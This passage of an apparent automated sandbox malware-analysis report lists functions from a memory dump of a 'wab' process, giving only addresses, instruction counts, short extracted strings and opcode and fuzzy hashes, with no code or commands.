                                                Function 00583E48 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Vuj
                                                • API String ID: 0-931215601
                                                • Opcode ID: 5db0cf7de4f802d54ac146e0c673a520834ac39a966260299d66946bd3e50d29
                                                • Instruction ID: 5d492b8ee91b9521bdb53f48b818d3e788614956c12656e11e3a9327d32cb6a2
                                                • Opcode Fuzzy Hash: 5db0cf7de4f802d54ac146e0c673a520834ac39a966260299d66946bd3e50d29
                                                • Instruction Fuzzy Hash: 3D914A70E00209DFDB14DFA9C98579EBFF2BF88704F148129E805BB294EB749945CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00584A60 Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ac54e90742f6c086e63d4cfafb87d437771ab02436773471604246f615e80db
                                                • Instruction ID: 0124e7446409c0ba39e6cb82d8de0400da8faa7af9be2c8882d634f6460f0900
                                                • Opcode Fuzzy Hash: 0ac54e90742f6c086e63d4cfafb87d437771ab02436773471604246f615e80db
                                                • Instruction Fuzzy Hash: A1B11870E0020A8FDB14EFA9D9857AEBFF2BB88315F148529DC15A7294EB749845CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058A598 Relevance: 1.6, Strings: 1, Instructions: 373COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: _
                                                • API String ID: 0-701932520
                                                • Opcode ID: c5841e2b9ee42cc6d18b55e08aef7b137deca739531b0cdf9b6d1ab1b43573ce
                                                • Instruction ID: f3d4c3ae6a6c0d091845c6b1a003281d16d3a6293111aed508d4054255acebfc
                                                • Opcode Fuzzy Hash: c5841e2b9ee42cc6d18b55e08aef7b137deca739531b0cdf9b6d1ab1b43573ce
                                                • Instruction Fuzzy Hash: 1AD1D070B002058FEB14DF69D884B9EBBB5FB84310F20856AE909EB395E774DD41CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058F478 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHdq
                                                • API String ID: 0-2991842255
                                                • Opcode ID: fb1ab0e2bc42ede668f6ecc2eb735e5e79f557089c2be405048f088dbdb5055f
                                                • Instruction ID: 5406e51de2891040def86b9edf1ff97374b6dbdb5e2dd44841c48498f419ff29
                                                • Opcode Fuzzy Hash: fb1ab0e2bc42ede668f6ecc2eb735e5e79f557089c2be405048f088dbdb5055f
                                                • Instruction Fuzzy Hash: 7C31AB31B002158FDB18AF78995466E7BE6FB89314F204939D80AEB3A1EE75DD41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00587D60 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LRdq
                                                • API String ID: 0-3106745678
                                                • Opcode ID: bca8fc49bb774bea0353b8b6583a6467e039410b4f32c5aba7edc062b8122f83
                                                • Instruction ID: 0dcb9c0937b70b309c0e4ca1141b0d5c8bf425a1e2dcc11e39d8d2aa00dc00f5
                                                • Opcode Fuzzy Hash: bca8fc49bb774bea0353b8b6583a6467e039410b4f32c5aba7edc062b8122f83
                                                • Instruction Fuzzy Hash: E0316E30E1521D9BDB14EBA5C4447AEBBB5FF99304F248565E902FB290EB74DC42CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00581138 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$Y$\$Y$t$Y$\$Y$
                                                • API String ID: 0-1241737453
                                                • Opcode ID: 17efba7304281ce6400929ee620a3190a1674993e00ea9098ef973dd77d4ad28
                                                • Instruction ID: d1d9d8baff7aa0282288b72f943918b179a16b2dcfe65a057a766bb68f8fe35a
                                                • Opcode Fuzzy Hash: 17efba7304281ce6400929ee620a3190a1674993e00ea9098ef973dd77d4ad28
                                                • Instruction Fuzzy Hash: 9141F6702713568FC705DB29D891D593BB1F7A231B704856AE0084B266FF38AD89CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058F46B Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHdq
                                                • API String ID: 0-2991842255
                                                • Opcode ID: c537f5ef29ce4f81f158a266e09dc6d6669982f2464bcb76485188813db4769a
                                                • Instruction ID: 6be77227025ef7274549ba3eb63e0c3e5cf19abddc8dec9c9d649364d0052c9f
                                                • Opcode Fuzzy Hash: c537f5ef29ce4f81f158a266e09dc6d6669982f2464bcb76485188813db4769a
                                                • Instruction Fuzzy Hash: 3031BC31B002058FDB19AF74951466F7BE3BB88310F244929D806EB3A5EF75DD81CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058A109 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 1751ec0a23620ed614152e2be9c2b233f286c972b6a694ffa0bb78c76cef0dc1
                                                • Instruction ID: 3a52eca2dee722a4f6497dca5b2a8a026c45a87b07389dafe9f045bd7e3a0309
                                                • Opcode Fuzzy Hash: 1751ec0a23620ed614152e2be9c2b233f286c972b6a694ffa0bb78c76cef0dc1
                                                • Instruction Fuzzy Hash: B231A730E102198BDB15DFA4C5846DEFBB2BF89300F10861AE816FB250DB75DC85CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00586B68 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LRdq
                                                • API String ID: 0-3106745678
                                                • Opcode ID: 30286fbb80959dcce1b0c86b5b64decebbcb56eb730ab3e80edc00845ec0dc82
                                                • Instruction ID: 20efb7ed44859aa453aa61da403b8c0f8752a66fd5152dca9237d3d4d90f5b39
                                                • Opcode Fuzzy Hash: 30286fbb80959dcce1b0c86b5b64decebbcb56eb730ab3e80edc00845ec0dc82
                                                • Instruction Fuzzy Hash: FE2102303182504FC715AB38D414AAE3FF6EFC6305B0584AAE009CB3A9EE79CC058792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00581840 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: X
                                                • API String ID: 0-3081909835
                                                • Opcode ID: 4253bcb930954445e2793b22a094d7914984b327892b809fecc43329e271c55d
                                                • Instruction ID: 2f2b2986e1865931c5cfc3df29b44c2a2bc21c71cddbaa3a27beac41c8107ff4
                                                • Opcode Fuzzy Hash: 4253bcb930954445e2793b22a094d7914984b327892b809fecc43329e271c55d
                                                • Instruction Fuzzy Hash: DB212C30A00645CFDB14EB64C5696AE7BFAFB49345F2005A8D805FB290DF358D42CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00581678 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$Y$\$Y$t$Y$\$Y$
                                                • API String ID: 0-1241737453
                                                • Opcode ID: c285d6c93b8e9e251205f1f77fe3a25261ebb81be2b298256fdd944112a4aeea
                                                • Instruction ID: 3368cb8713392d5134c04224f8b3a94301800993e85bb90d4e5509c6d6f52654
                                                • Opcode Fuzzy Hash: c285d6c93b8e9e251205f1f77fe3a25261ebb81be2b298256fdd944112a4aeea
                                                • Instruction Fuzzy Hash: 1221B7706202114FDF10E728D984F1E3B6AF755323F15492AE40ADB265FE38DC858F85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058E2B7 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: cbb6f651e2692ba1486c6d601c586921577a63c510e3d69fb54807823918c399
                                                • Instruction ID: 2753b1153d4a9575dc713327dfb62fb49c16d93afa91e349ea2036915f4797cf
                                                • Opcode Fuzzy Hash: cbb6f651e2692ba1486c6d601c586921577a63c510e3d69fb54807823918c399
                                                • Instruction Fuzzy Hash: A8115E74B002159FDB54EB78C909B6D7BF5AF8C700F108469E94AE73A1EB359D00DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058E2C0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: 9e18223bc1156fafd4edf1ed6b52553760c7c75b9e18c01ff2a74f2a07a3c3b5
                                                • Instruction ID: 3e0ad68ef369d2bda4989b663c1bfb404adf15229f1dd949068817463fa7fbb1
                                                • Opcode Fuzzy Hash: 9e18223bc1156fafd4edf1ed6b52553760c7c75b9e18c01ff2a74f2a07a3c3b5
                                                • Instruction Fuzzy Hash: 2C111C75B002159FDB54AB788909B6D7BF5BB88700F108869E90AE73A1EB35AD019B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005887C0 Relevance: .6, Instructions: 556COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c7c7b7c4a001814c1d41c2fab8ed47425890beeab7da157d18fb9b7eb48c369
                                                • Instruction ID: 3aaef2cb422bb53b23a0f427a7d3d1ded937d70d7e94de5dbfb4c3fddfbb871c
                                                • Opcode Fuzzy Hash: 1c7c7b7c4a001814c1d41c2fab8ed47425890beeab7da157d18fb9b7eb48c369
                                                • Instruction Fuzzy Hash: 68128230710212DBDB29AB28D48866D77A2FBC5309F544A2AF40ADB3A5DF79DC46C781
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058A22A Relevance: .4, Instructions: 390COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9bf7394a82e0f8d20cb60f9948928e9d872c2e01e06cb7bf8a904ced7caab1ef
                                                • Instruction ID: fe0f6a05cbeb4f53f8997e7c1fcc431e60c090c7a32febe7629d9e07d95e2903
                                                • Opcode Fuzzy Hash: 9bf7394a82e0f8d20cb60f9948928e9d872c2e01e06cb7bf8a904ced7caab1ef
                                                • Instruction Fuzzy Hash: 8AE15075A002158FDF14EBA8C594A6DBBB2FB88311F24852AE806E7365DB74DD41CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058DD98 Relevance: .3, Instructions: 344COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e36ff9d1eb596888b98829833bce2e5b194550d9e496681a5f35ea5ca7a6aed2
                                                • Instruction ID: 6dbeca4b974f3c3efd09ae61cc337fd7cd33b4455e6a3dcca72267040172d68f
                                                • Opcode Fuzzy Hash: e36ff9d1eb596888b98829833bce2e5b194550d9e496681a5f35ea5ca7a6aed2
                                                • Instruction Fuzzy Hash: C1C1F271B002169FDB15EB68C884A6EBBB6FBC4310F248669D909DB395CB35EC42C7D1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00586CB0 Relevance: .1, Instructions: 132COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c698696cdb85a49ff43c215abdb2f635606cb46cab54c8561a6b0328a7b26fef
                                                • Instruction ID: 8ef31db77cec64abae8fbfaef1b6ebad847b7fad7efadf08cfaefa263594de37
                                                • Opcode Fuzzy Hash: c698696cdb85a49ff43c215abdb2f635606cb46cab54c8561a6b0328a7b26fef
                                                • Instruction Fuzzy Hash: 735125B4E10218CFDB18DFA9C885B9EBBB1BF48310F148119D815BB355DB74A844CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058F302 Relevance: .1, Instructions: 126COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb7a75bc8bb146206361d9aa8228ecb781d8308e4e2fc4b28dbff851bd6c9603
                                                • Instruction ID: a9ceaab0e33161aa46ae450c27d1ec3c6e7c8af2c5bd436901d5a5c2174075ff
                                                • Opcode Fuzzy Hash: fb7a75bc8bb146206361d9aa8228ecb781d8308e4e2fc4b28dbff851bd6c9603
                                                • Instruction Fuzzy Hash: 5A41CE31B001058BDF15AB68D4906ADBFB2FBDC324F248876D90AEB251EB35DD868761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00586F36 Relevance: .1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 532cf6990d142d72946f69dc31d8e248d0e9788abf9fe5fafbfeda92769e56a1
                                                • Instruction ID: 93356ec119f868e92a53d964d2b872b592389aabf72ed08f9b7a86fc4e21ed71
                                                • Opcode Fuzzy Hash: 532cf6990d142d72946f69dc31d8e248d0e9788abf9fe5fafbfeda92769e56a1
                                                • Instruction Fuzzy Hash: 9E41E834610119CFCB04EB68C598AAE7BF2BF8C705F214559E906EB3A1DB75DC41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058EDB8 Relevance: .1, Instructions: 112COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8a04b85beac25c42cb3d3dd350fb6a7bd241d79f462de1ff38dc4dc4860fb0c
                                                • Instruction ID: 91af4d9b6b71c0d3c5cd4c409e4041b6db78a2ac0548c7c3f29af90c1206b4d1
                                                • Opcode Fuzzy Hash: d8a04b85beac25c42cb3d3dd350fb6a7bd241d79f462de1ff38dc4dc4860fb0c
                                                • Instruction Fuzzy Hash: F0412A747102058FCB14EB29C885E6ABBF6FF89715B158969E906EB374DB70EC40CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058EF2D Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4cc5506d752e3c9ea75dcba6f0e62da071dd92985eb2e2f6a40ddeee7465bcd7
                                                • Instruction ID: 374e7fb0f1eb18bdaa24537acdd6a1e6896d9008856920462c791b458344f0d2
                                                • Opcode Fuzzy Hash: 4cc5506d752e3c9ea75dcba6f0e62da071dd92985eb2e2f6a40ddeee7465bcd7
                                                • Instruction Fuzzy Hash: B9318630A107198FDB10EF69C48565EBBF1FF99304F108929E909EB254DB74AC45CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005826A4 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7b9ba2db6719d80fc13cd77a05f6047d5a7ad27112bc3aea3193ad1b17fb0b5
                                                • Instruction ID: 6bbc2741408854a4b51e9c00183835cbdeccd6abc157ed3a52328869b13fefa2
                                                • Opcode Fuzzy Hash: e7b9ba2db6719d80fc13cd77a05f6047d5a7ad27112bc3aea3193ad1b17fb0b5
                                                • Instruction Fuzzy Hash: 4241E0B0D003499FDB14DFAAC884ADEBFF5FF48314F608429E819AB250DB75A945CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00585060 Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f72073c5f0d53da0d79d237907d46d8c234e2d928ece328239110a5c70c64a7
                                                • Instruction ID: 2654b0cdfa6becfa7d8f335710077005b86482e2eba6811f41ca431017382d32
                                                • Opcode Fuzzy Hash: 6f72073c5f0d53da0d79d237907d46d8c234e2d928ece328239110a5c70c64a7
                                                • Instruction Fuzzy Hash: 27312830600615CFCB15EB74C968AAE7BB6FB89345F2004A9D845BB395EF3ADD41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005826B0 Relevance: .1, Instructions: 90COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f08c19c733ce9ceea8b2138e9582c3de1a64cc24adbc175aa63e89925947742
                                                • Instruction ID: 67f272db49fbfb25b0a0cae3a74d6c57b86e856bb0e0343533bc16eb79c4a1d6
                                                • Opcode Fuzzy Hash: 0f08c19c733ce9ceea8b2138e9582c3de1a64cc24adbc175aa63e89925947742
                                                • Instruction Fuzzy Hash: 2C41DEB0D003499FDB14DFAAC884ADEBFF5FF48314F608429E819AB254DB75A945CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00585070 Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f4a1406feeda8355dacd55117dcab90d5baad3879097c58e73a7b42fff72034
                                                • Instruction ID: 08ece242da64e99438214dfa964b5ecaacdd5b42d0b59d54da1e7700cf1235d2
                                                • Opcode Fuzzy Hash: 2f4a1406feeda8355dacd55117dcab90d5baad3879097c58e73a7b42fff72034
                                                • Instruction Fuzzy Hash: AF311630600615CFDB14EB78C958AAE7BB6FB88345F200469D806BB395EF3ADD41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00587E79 Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51dec901c9380253057d6869f59365dfd8e878daee500ea858ff1fd4e9f52250
                                                • Instruction ID: 59b88576534d00aa646689a7206223be387fe1a85961b127c67217f7807cd881
                                                • Opcode Fuzzy Hash: 51dec901c9380253057d6869f59365dfd8e878daee500ea858ff1fd4e9f52250
                                                • Instruction Fuzzy Hash: 8F313C347102159FDB05ABB4C458B6E3BB6FBC8316F248068E50A973A8DF399C82DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058E381 Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd2b0ff66a9acea542d0daa0f108337c9f12abf645bcf766b1b5dd5a0863eae0
                                                • Instruction ID: 85375b2c2fed8164eae4f0a613e01f4e3f717d93994796ee312ac2fcb99d3a50
                                                • Opcode Fuzzy Hash: dd2b0ff66a9acea542d0daa0f108337c9f12abf645bcf766b1b5dd5a0863eae0
                                                • Instruction Fuzzy Hash: DB21F3317083954FC72AAB3899A816E7AE3AFD6211719447ED44ACB397DE39CC068391
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058133F Relevance: .1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 837e04f60977cc82abcf60efd4486e97b05bc22d9828d69b2b846992bfda1dbc
                                                • Instruction ID: fee112a53278cd43b56382fdfc632e493fe9bc4bf13f9ee5d8c2e242b7230921
                                                • Opcode Fuzzy Hash: 837e04f60977cc82abcf60efd4486e97b05bc22d9828d69b2b846992bfda1dbc
                                                • Instruction Fuzzy Hash: F821C670600A118BEF303724D4893A83F69F752327F140C2AE806E7691EE2D8D83875A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058A118 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43118134fe1c05628186a5a6aa679b6dd89a923af74a89f30f77ea49b936d85a
                                                • Instruction ID: 8de6c4b56f9e6a236ee6c2197e453eca5c3e376b5d94eb372fa0b98fbf0cdc87
                                                • Opcode Fuzzy Hash: 43118134fe1c05628186a5a6aa679b6dd89a923af74a89f30f77ea49b936d85a
                                                • Instruction Fuzzy Hash: FA21A630E1021A9BDB15DFA8C89469EFBB2BF85300F148616E815FB350DB75EC45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058A008 Relevance: .1, Instructions: 77COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f3d430cf5de825dadcf5599bb1d7d4d50b61e8229be0ff335d1744868c4ee6e
                                                • Instruction ID: 11b2a80c389d7759768c2a84336787dcc156c07cd10d904d42e4caba8a30f815
                                                • Opcode Fuzzy Hash: 5f3d430cf5de825dadcf5599bb1d7d4d50b61e8229be0ff335d1744868c4ee6e
                                                • Instruction Fuzzy Hash: 6C217F31E04609CBDB15DF64C4586DEBBB2BF89310F20862AFC15BB290DB71A9468B52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0055D030 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2954988338.000000000055D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0055D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_55d000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 698a943808d63d498819474562004845bc140cf31fa8f191e6be5b9d18f8937e
                                                • Instruction ID: 10b40a93b6bb45fb9693b8b246069d6fc0118081c76edfe9b263d0485da27104
                                                • Opcode Fuzzy Hash: 698a943808d63d498819474562004845bc140cf31fa8f191e6be5b9d18f8937e
